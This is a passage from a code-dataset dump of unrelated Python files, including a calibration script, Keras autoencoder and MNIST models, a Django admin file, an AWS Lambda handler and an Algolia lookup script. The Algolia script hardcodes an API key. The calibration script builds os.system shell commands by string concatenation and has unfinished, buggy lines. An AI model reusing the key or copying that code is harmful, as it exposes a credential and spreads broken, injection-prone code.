diameter:\n print(\"==============================================\\n\",\n ballsRolled + \" / \" + numOfBalls + \"Skipping the\" + mass + \"gram ball as it will not fit in cartridge\")\n touchFile = testDir + ' / ' + massSizeSkipped\n os.system(\"touch $touchFile\")\nprint(\"=========================================================\\n\")\nprint(ballsRolled / numOfBalls + \"Please use \" + mass + \"gram ball next...\")\nprint(\"Roll the ball through the training cartridge three times in the same direction within 30 seconds\\n\")\nprint(\"Press 'Escape' to skip this ball or 'Enter' when you're ready to begin\")\nwhile True:\n try:\n if keyboard.is_pressed('esc'):\n print(\"Skipping \" + balls + \" gram ball by user command\")\n break\n\n if keyboard.is_pressed('enter'):\n testfile = testDir / mass-g.csv #Need: Help Here\n os.system(\"python /root/DeviceBackend/example/totalreader/totalreader_csv.py -c\" + testfile + \" 0.01 30 \" + mass)\n numOfBalls = numOfBalls - 1\n break\n except:\n break\n\nprint(\"Restarting Device Backend service...\")\nos.system(\"systemctl start rosenimbus-backend.service\")\n\n\n\n", "sub_path": "mass.py", "file_name": "mass.py", "file_ext": "py", "file_size_in_byte": 2828, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.isfile", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "os.system", "line_number": 32, "usage_type": "call"}, {"api_name": "os.system", "line_number": 40, "usage_type": "call"}, {"api_name": "os.system", "line_number": 42, "usage_type": "call"}, {"api_name": "os.system", "line_number": 57, "usage_type": "call"}, {"api_name": "keyboard.is_pressed", "line_number": 64, "usage_type": "call"}, {"api_name": "keyboard.is_pressed", "line_number": 68, "usage_type": "call"}, {"api_name": "os.system", "line_number": 70, "usage_type": "call"}, {"api_name": "os.system", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "65334916", "text": "import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport tensorflow.python.util.deprecation as deprecation\ndeprecation._PRINT_DEPRECATION_WARNINGS = False\n\n# ↑ Used to remove warning and info messages from tensorflow ↑\n\nimport pickle\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input, Dense, Dropout, Flatten, Reshape\nfrom tensorflow.keras.layers import Conv2D, Conv2DTranspose, MaxPooling2D, UpSampling2D\n\ndef LoadDataset(size, display_template):\n if size == 0:\n pickle_in = open(\"dataset_min.pickle\",\"rb\")\n\n elif size == 1:\n pickle_in = open(\"dataset_mid.pickle\",\"rb\")\n\n elif size == 2:\n pickle_in = open(\"dataset.pickle\",\"rb\")\n\n dataset = np.asarray(pickle.load(pickle_in))\n\n if display_template:\n plt.imshow(dataset[0])\n plt.show()\n\n return dataset\n \n\ndef CreateEncoder(display_summary, optimizer, loss):\n i = Input( shape=(64, 64, 3, ) )\n\n x = Conv2D( 8, (3, 3), activation=\"relu\", padding=\"same\" )(i)\n x = MaxPooling2D( (2, 2) )(x)\n # Output size = (32, 32, 9)\n\n x = Conv2D( 16, (3, 3), activation=\"relu\", padding=\"same\" )(x)\n x = MaxPooling2D( (2, 2) )(x)\n # Output size = (16, 16, 16)\n\n x = Conv2D( 8, (3, 3), activation=\"relu\", padding=\"same\" )(x)\n x = MaxPooling2D( (2, 2) )(x)\n # Output size = (8, 8, 8)\n\n x = Flatten()(x)\n # Output size = (512)\n\n x = Dense( 512, activation=\"relu\" )(x)\n x = Dense( 64, activation=\"sigmoid\" )(x) # Latent space ranges from 0 to 1 -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n\n m = Model(i, x)\n m.compile( optimizer=optimizer, loss=loss )\n\n if ( display_summary ): print( m.summary() )\n\n return m\n\ndef CreateDecoder(display_summary, optimizer, loss):\n i = Input( shape=(64, ) )\n\n x = Dense( 512, activation=\"relu\" )(i)\n\n x = Reshape( target_shape=(8, 8, 8) )(x)\n \n x = UpSampling2D( (2, 2) )(x)\n x = Conv2DTranspose( 16, (3, 3), activation=\"relu\", padding=\"same\" )(x)\n # Output shape = (16, 16, 8)\n\n x = Flatten()(x)\n # Output shape = (2048)\n\n x = Dense( 4096, activation=\"relu\" )(x)\n x = Dense( 8192, activation=\"relu\" )(x)\n\n x = Reshape( target_shape=(32, 32, 8) )(x)\n # Output shape = (32, 32, 8)\n\n x = UpSampling2D( (2, 2) )(x)\n x = Conv2DTranspose( 3, (3, 3), activation=\"sigmoid\", padding=\"same\" )(x)\n # Output shape = (64, 64, 3)\n\n m = Model(i, x)\n m.compile( optimizer=optimizer, loss=loss )\n\n if ( display_summary ): print( m.summary() )\n\n return m\n\ndef CreateAutoencoder(encoder, decoder, display_summary, optimizer, loss):\n i = Input( shape=(64, 64, 3, ) )\n\n x = encoder(i)\n\n x = decoder(x)\n\n m = Model(i, x)\n m.compile( optimizer=optimizer, loss=loss )\n\n if ( display_summary ): print( m.summary() )\n\n return m\n\ndef SampleDecodedQuality(epoch):\n # Predict the images from the given latent values\n sample = np.random.randint(0, dataset.shape[0], size=25)\n images = autoencoder.predict(dataset[sample])\n\n # Create a figure from the predicted images\n w, h = 64, 64\n cols, rows = 5, 5\n\n fig=plt.figure(figsize=(8, 8))\n\n for i in range(1, cols*rows +1):\n fig.add_subplot(rows, cols, i)\n plt.axis('off')\n plt.imshow(images[i-1])\n\n # Save the figure to the images dir\n plt.savefig(f\"Images/Epoch #{epoch}\")\n plt.close(fig)\n\ndef SaveModel(name, model):\n model.save(name)\n\ndef LoadModels(encoder_path, decoder_path):\n encoder = tf.keras.models.load_model(encoder_path)\n decoder = tf.keras.models.load_model(decoder_path)\n\n return encoder, decoder\n\ndef TrainAutoencoder(epochs, update_rate, batch_size, dataset):\n history = np.array((0))\n\n for e in range(epochs):\n epoch = (e * update_rate)\n print(f\"Beginning Epoch #{epoch}\")\n\n # Train the autoencoder for x epochs\n h = autoencoder.fit(dataset, dataset, epochs=epochs, batch_size=batch_size, verbose=0)\n\n history = np.append(history, h.history[\"loss\"])\n\n SampleDecodedQuality(epoch)\n\n # Make a save of both models on this generation for backup purposes\n SaveModel(f\"Models/Backup/Encoder/encoder_{epoch}\", encoder)\n SaveModel(f\"Models/Backup/Decoder/decoder_{epoch}\", decoder)\n\n return history\n\n\n# Used to trach how long the training process takes\nstart_time = time.time()\n\nEPOCHS = 20 # How many times the network updates image and save outputs\nUPDATE_RATE = 10 # How often the network updates image and save outputs\nBATCH_SIZE = 1024 # Batch size for training\nUSE_OLD_MODELS = False\n\n# Load a dataset (0 = min, 1 = mid, 2 = max)\nprint(\"Loading dataset\")\ndataset = LoadDataset(1, False)\n\nprint(f\"Finished loading dataset in {start_time - time.time()} seconds\")\n\nif USE_OLD_MODELS:\n encoder, decoder = LoadModels(\"Models/Models-8/Encoder/encoder_90\", \"Models/Models-8/Decoder/decoder_90\")\nelse:\n encoder = CreateEncoder(False, \"Adam\", \"mse\")\n decoder = CreateDecoder(False, \"Adam\", \"mse\")\n\nautoencoder = CreateAutoencoder(encoder, decoder, True, \"Adam\", \"mse\")\n\nstart_time = time.time()\nhistory = TrainAutoencoder(EPOCHS, UPDATE_RATE, BATCH_SIZE, dataset)\nprint(f\"Finished training, completed {EPOCHS * UPDATE_RATE} epochs in {start_time - time.time()} seconds\")\n\nplt.plot(history)\nplt.savefig(\"Images/Loss_Graph\")", "sub_path": "Python/_Autoencoder/Celeba Autoencoder/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5637, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 2, "usage_type": "attribute"}, {"api_name": "tensorflow.python.util.deprecation._PRINT_DEPRECATION_WARNINGS", "line_number": 5, "usage_type": "attribute"}, {"api_name": "tensorflow.python.util.deprecation", "line_number": 5, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 29, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Reshape", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.UpSampling2D", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2DTranspose", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Reshape", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.UpSampling2D", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2DTranspose", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 113, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 135, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 136, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 150, "usage_type": "call"}, {"api_name": "time.time", "line_number": 162, "usage_type": "call"}, {"api_name": "time.time", "line_number": 173, "usage_type": "call"}, {"api_name": "time.time", "line_number": 183, "usage_type": "call"}, {"api_name": "time.time", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}]} +{"seq_id": "235613975", "text": "from algoliasearch import algoliasearch\n\nclient = algoliasearch.Client(\"HD0XCBXFH1\", 'a579548162960a8ecf866b64340c86e4')\nindex = client.init_index('signs')\n\n# res = index.add_objects([\n# {\"name\": \"Stop\", \"meaning\": \"You have to stop.\"},\n# {\"name\": \"Start\", \"meaning\": \"You have to start.\"}\n# ])\n\n# print res\ndictionary = {\n \"startId\":\"17375292\",\n \"stopId\":\"17375282\"\n}\nres = index.get_objects([dictionary[\"startId\"]])\n\nprint(res['results'][0]['meaning'])\n\nres = index.get_objects([dictionary[\"stopId\"]])\n\nprint(res['results'][0]['meaning'])", "sub_path": "ReadBraille_MadHacks/algolia_python.py", "file_name": "algolia_python.py", "file_ext": "py", "file_size_in_byte": 554, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "algoliasearch.algoliasearch.Client", "line_number": 3, "usage_type": "call"}, {"api_name": "algoliasearch.algoliasearch", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "30358188", "text": "\n# Django\nfrom django.contrib import admin\n\n# Models\nfrom .models import Marca, Rubro, UnidadMedida, Articulo, Comanda\n\n\nclass MarcaAdmin(admin.ModelAdmin):\n\n list_display = [\n 'descripcion',\n 'activo'\n ]\n\n list_filter = [\n 'descripcion',\n 'activo'\n ]\n\n search_fields = [\n 'id',\n 'descripcion',\n 'activo'\n ]\n\n\nclass ComandaAdmin(admin.ModelAdmin):\n\n list_display = [\n 'descripcion',\n 'activo'\n ]\n\n list_filter = [\n 'descripcion',\n 'activo'\n ]\n\n search_fields = [\n 'id',\n 'descripcion',\n 'activo'\n ]\n\nclass RubroAdmin(admin.ModelAdmin):\n\n list_display = [\n 'id',\n 'descripcion'\n ]\n\n list_filter = [\n 'descripcion'\n ]\n\n search_fields = [\n 'id',\n 'descripcion'\n ]\n\n\nclass UnidadMedidaAdmin(admin.ModelAdmin):\n\n list_display = [\n 'id',\n 'descripcion',\n 'abreviatura'\n ]\n\n list_filter = [\n 'id',\n 'descripcion',\n 'abreviatura'\n ]\n\n search_fields = [\n 'id',\n 'descripcion',\n 'abreviatura'\n ]\n\n\nclass ArticuloAdmin(admin.ModelAdmin):\n\n list_display = [\n 'codigo',\n 'descripcion',\n 'cantidad',\n 'cantidad_minima',\n 'rubro',\n 'marca',\n 'precio_compra',\n 'precio_venta',\n 'proveedor',\n 'receta'\n ]\n\n search_fields = [\n 'rubro__descripcion',\n 'marca__descripcion',\n 'codigo',\n 'descripcion',\n 'cantidad_minima',\n 'precio_compra',\n 'precio_venta'\n ]\n\n list_filter = [\n 'rubro__descripcion',\n 'marca__descripcion',\n 'codigo',\n 'descripcion',\n 'cantidad_minima',\n 'precio_compra',\n 'precio_venta'\n ]\n\nadmin.site.register(Marca, MarcaAdmin)\nadmin.site.register(Rubro, RubroAdmin)\nadmin.site.register(Comanda, ComandaAdmin)\nadmin.site.register(UnidadMedida, UnidadMedidaAdmin)\nadmin.site.register(Articulo, ArticuloAdmin)\n", "sub_path": "apps/articulos/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 28, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 46, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 46, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 63, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 63, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 84, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 84, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 119, "usage_type": "call"}, {"api_name": "models.Marca", "line_number": 119, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 119, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 119, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Rubro", "line_number": 120, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 120, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 120, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 121, "usage_type": "call"}, {"api_name": "models.Comanda", "line_number": 121, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 121, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 121, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 122, "usage_type": "call"}, {"api_name": "models.UnidadMedida", "line_number": 122, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 122, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 122, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 123, "usage_type": "call"}, {"api_name": "models.Articulo", "line_number": 123, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 123, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 123, "usage_type": "name"}]} +{"seq_id": "494218466", "text": "# Attempt 1\n# 97.6-98% accuracy on test data\n# Basic feedforward neural network for MNIST Digit Recognition\n\nimport keras\nfrom keras.datasets import mnist\nfrom keras.layers import Dense, Dropout\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\n\n# formatting training and test data\n(train_input, train_output), (test_input, test_output) = mnist.load_data()\n\ntrain_input = train_input.astype('float32')\ntrain_input /= 255\ntrain_input = train_input.reshape(train_input.shape[0], 784)\n\ntrain_output = keras.utils.to_categorical(train_output, 10)\n\ntest_input = test_input.astype('float32')\ntest_input /= 255\ntest_input = test_input.reshape(test_input.shape[0], 784)\n\ntest_output = keras.utils.to_categorical(test_output, 10)\n\n\n# neural network\nmodel = Sequential()\n\nmodel.add(Dense(150,\n activation='sigmoid',\n kernel_initializer='lecun_uniform'))\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(10, activation='softmax'))\n\nmodel.compile(optimizer=Adam(),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\nprint(\"Training...\")\nmodel.fit(train_input,\n train_output,\n batch_size=10,\n epochs=27,\n verbose=2)\n\nprint(\"Testing...\")\nscore = model.evaluate(test_input, test_output)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])", "sub_path": "FeedforwardOne.py", "file_name": "FeedforwardOne.py", "file_ext": "py", "file_size_in_byte": 1346, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "keras.datasets.mnist.load_data", "line_number": 12, "usage_type": "call"}, {"api_name": "keras.datasets.mnist", "line_number": 12, "usage_type": "name"}, {"api_name": "keras.utils.to_categorical", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 18, "usage_type": "attribute"}, {"api_name": "keras.utils.to_categorical", "line_number": 24, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 24, "usage_type": "attribute"}, {"api_name": "keras.models.Sequential", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "613396957", "text": "import json\nfrom vger_commons.database_connection.sql_alchemy_session import SqlAlchemySession\nfrom vger_commons.database_connection.sql_alchemy_session import rollback_and_close\nfrom vger_commons.database_connection.sql_alchemy_session import update_team_status_states\nfrom vger_commons.database_connection.sql_alchemy_session import update_team_work_states\nfrom vger_commons.database_connection.sql_alchemy_session import update_default_lead_time_states\nfrom utils.api_response_helper import ApiResponseError\nfrom utils.api_response_helper import response_formatter\nfrom utils.api_response_helper import api_response_handler\nfrom utils.jira_helper.JiraBoardConfiguration import JiraBoardConfiguration\n\n\ndef handler(event, context):\n return api_response_handler(__update_work_states, event)\n\n\ndef __update_work_states(event):\n board_configuration = __parse_lambda_input_for_jira_configuration(event)\n project_id = __parse_project_id_from_input(event)\n __apply_work_state_update(board_config=board_configuration, project_id=project_id)\n return response_formatter(status_code='200', body={})\n\n\ndef __parse_lambda_input_for_jira_configuration(lambda_input):\n try:\n # User input\n data = json.loads(lambda_input['body'])\n return JiraBoardConfiguration(work_states=data['workStates'],\n lead_time_start_state=data['defaultLeadTimeStartState'],\n lead_time_end_state=data['defaultLeadTimeEndState'])\n except Exception:\n payload = {'message': 'Invalid user input'}\n raise ApiResponseError(status_code=400, body=payload)\n\n\ndef __parse_project_id_from_input(lambda_input):\n try:\n return lambda_input.get('pathParameters').get('id')\n except Exception:\n payload = {\"message\": \"Could not get id path parameter\"}\n raise ApiResponseError(status_code=400, body=payload)\n\n\ndef __apply_work_state_update(board_config, project_id):\n sqlalchemy = SqlAlchemySession()\n session = sqlalchemy.Session()\n try:\n status_state_values = [] # Values to insert in team_status_states table\n work_state_values = [] # Values to insert in team_work_states table\n seq_number = 0 # Sequence counter for team_work_states table\n\n for work_state in board_config.work_states:\n for status in work_state['status']:\n status_state_values.append((int(project_id), str(status), str(work_state['name'])))\n\n work_state_values.append((int(project_id), str(work_state['name']), seq_number))\n seq_number += 1\n update_team_status_states(project_id=project_id,\n status_states_list=status_state_values,\n session=session)\n update_team_work_states(project_id=project_id,\n work_states_list=work_state_values,\n session=session)\n update_default_lead_time_states(project_id=project_id,\n start_state=board_config.lead_time_start_state,\n end_state=board_config.lead_time_end_state,\n session=session)\n session.close()\n except Exception:\n rollback_and_close(session)\n payload = {'message': 'Internal error'}\n raise ApiResponseError(status_code=500, body=payload)\n", "sub_path": "source/web_api/update_work_states/update_work_states.py", "file_name": "update_work_states.py", "file_ext": "py", "file_size_in_byte": 3451, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "utils.api_response_helper.api_response_handler", "line_number": 14, "usage_type": "call"}, {"api_name": "utils.api_response_helper.response_formatter", "line_number": 21, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.jira_helper.JiraBoardConfiguration.JiraBoardConfiguration", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.api_response_helper.ApiResponseError", "line_number": 33, "usage_type": "call"}, {"api_name": "utils.api_response_helper.ApiResponseError", "line_number": 41, "usage_type": "call"}, {"api_name": "vger_commons.database_connection.sql_alchemy_session.SqlAlchemySession", "line_number": 45, "usage_type": "call"}, {"api_name": "vger_commons.database_connection.sql_alchemy_session.update_team_status_states", "line_number": 58, "usage_type": "call"}, {"api_name": "vger_commons.database_connection.sql_alchemy_session.update_team_work_states", "line_number": 61, "usage_type": "call"}, {"api_name": "vger_commons.database_connection.sql_alchemy_session.update_default_lead_time_states", "line_number": 64, "usage_type": "call"}, {"api_name": "vger_commons.database_connection.sql_alchemy_session.rollback_and_close", "line_number": 70, "usage_type": "call"}, {"api_name": "utils.api_response_helper.ApiResponseError", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "181286151", "text": "import requests\nimport datetime\n\nurl = 'http://localhost:57004/api/CloudData?metaObjectCode=WangDongApp.DataTest'\n\ni = 90000\n\ndata = {\n 'positiveNumber': i,\n 'Text': 'Text测试'+str(i),\n 'DateTime': str(datetime.datetime.now()),\n 'TrueOrFalse': True,\n 'Integer': i,\n 'Long': i,\n 'Double': i\n}\nresponse = requests.post(url, json=data)\nprint(response.text)\n", "sub_path": "60-Tools/api_post.py", "file_name": "api_post.py", "file_ext": "py", "file_size_in_byte": 377, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "213659678", "text": "import xlrd\nimport sys\nimport json\nfrom parser import get_text_and_colors, advance\n\nbook = xlrd.open_workbook(sys.argv[1], formatting_info=True)\nstart_row = 11\nstart_col = 3\nnum_time_slots = 16\nnum_days = 30\nnum_merged_columns = 5\noutput = []\nskipped_cx = [12, 20, 22, 18, 5]\ni = 1\n\nfor row in get_text_and_colors(book, start_row, start_col, num_days ,num_time_slots + num_merged_columns):\n hour = 6\n minute = 30\n d = '2017-12-%.2d' % (i)\n schedule = []\n j = 0\n for time_slot in row:\n text, color, column = time_slot\n if column in skipped_cx:\n continue\n if color == '#FFCC9A':\n text = '可用'\n for k in range(0, 2 if j > 0 else 1):\n schedule.append({\n 'time': '%.2d:%.2d' % (hour, minute),\n 'status': text,\n }) \n hour, minute = advance(hour, minute)\n j += 1\n output.append({'date': d, 'schedule': schedule, 'id': 488})\n i += 1\n\nwith open(sys.argv[2], 'w') as f:\n f.write(json.dumps(output, indent=4))\n", "sub_path": "convert.py", "file_name": "convert.py", "file_ext": "py", "file_size_in_byte": 1049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "xlrd.open_workbook", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "parser.get_text_and_colors", "line_number": 16, "usage_type": "call"}, {"api_name": "parser.advance", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 38, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "169317609", "text": "import pytest\nfrom advtraj.utils import grid as grid_utils\n\nfrom utils import create_uniform_grid\nimport xarray as xr\nimport numpy as np\n\n\ndef test_wrap_coord_posn():\n Lx = 1000.0\n x = np.array([-100.0, 0.0, Lx / 2.0, Lx, Lx + 100.0])\n x_wrapped_true = np.array([Lx - 100.0, 0.0, Lx / 2.0, 0.0, 100.0])\n x_wrapped = grid_utils.wrap_posn(x=x, x_min=0.0, x_max=Lx)\n np.testing.assert_allclose(x_wrapped_true, x_wrapped)\n\n\n@pytest.mark.parametrize(\"cell_centered\", [True, False])\ndef test_cyclic_coord_wrapping(cell_centered):\n dx = 25.0\n dL = (dx, dx, dx)\n L = (1.0e3, 1.0e3, 500.0)\n ds_grid = create_uniform_grid(dL=dL, L=L, cell_centered=cell_centered)\n\n Lx_c, Ly_c, Lz_c = [L[0] / 2.0, L[1] / 2.0, L[2] / 2.0]\n Lx, Ly, Lz = L\n\n start_and_wrapped_pt_coords = [\n # a point in the center of the domain should remain the same\n ((Lx_c, Ly_c, Lz_c), (Lx_c, Ly_c, Lz_c)),\n # wrapping in x should map these points to domain center\n ((Lx_c - Lx, Ly_c, Lz_c), (Lx_c, Ly_c, Lz_c)),\n ((Lx_c + Lx, Ly_c, Lz_c), (Lx_c, Ly_c, Lz_c)),\n # same in y\n ((Lx_c, Ly_c - Ly, Lz_c), (Lx_c, Ly_c, Lz_c)),\n ((Lx_c, Ly_c + Ly, Lz_c), (Lx_c, Ly_c, Lz_c)),\n # repeats for two wraps\n ((Lx_c - 2 * Lx, Ly_c, Lz_c), (Lx_c, Ly_c, Lz_c)),\n ((Lx_c + 2 * Lx, Ly_c, Lz_c), (Lx_c, Ly_c, Lz_c)),\n ((Lx_c, Ly_c - 2 * Ly, Lz_c), (Lx_c, Ly_c, Lz_c)),\n ((Lx_c, Ly_c + 2 * Ly, Lz_c), (Lx_c, Ly_c, Lz_c)),\n ]\n\n def _make_pt_dataset(pt):\n ds_pt = xr.Dataset()\n for n, v in enumerate([\"x\", \"y\", \"z\"]):\n ds_pt[v] = pt[n]\n return ds_pt\n\n def _pt_from_dataset(ds_pt):\n return np.array([ds_pt[v] for v in [\"x\", \"y\", \"z\"]])\n\n if cell_centered:\n cell_centered_coords = [\"x\", \"y\", \"z\"]\n else:\n cell_centered_coords = []\n\n for pt_start, pt_wrapped_correct in start_and_wrapped_pt_coords:\n ds_pt_start = _make_pt_dataset(pt_start)\n ds_pt_wrapped = grid_utils.wrap_periodic_grid_coords(\n ds_grid=ds_grid,\n ds_posn=ds_pt_start,\n cyclic_coords=(\"x\", \"y\"),\n cell_centered_coords=cell_centered_coords,\n )\n\n np.testing.assert_allclose(_pt_from_dataset(ds_pt_wrapped), pt_wrapped_correct)\n", "sub_path": "tests/test_grid_utils.py", "file_name": "test_grid_utils.py", "file_ext": "py", "file_size_in_byte": 2297, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "advtraj.utils.grid.wrap_posn", "line_number": 13, "usage_type": "call"}, {"api_name": "advtraj.utils.grid", "line_number": 13, "usage_type": "name"}, {"api_name": "numpy.testing.assert_allclose", 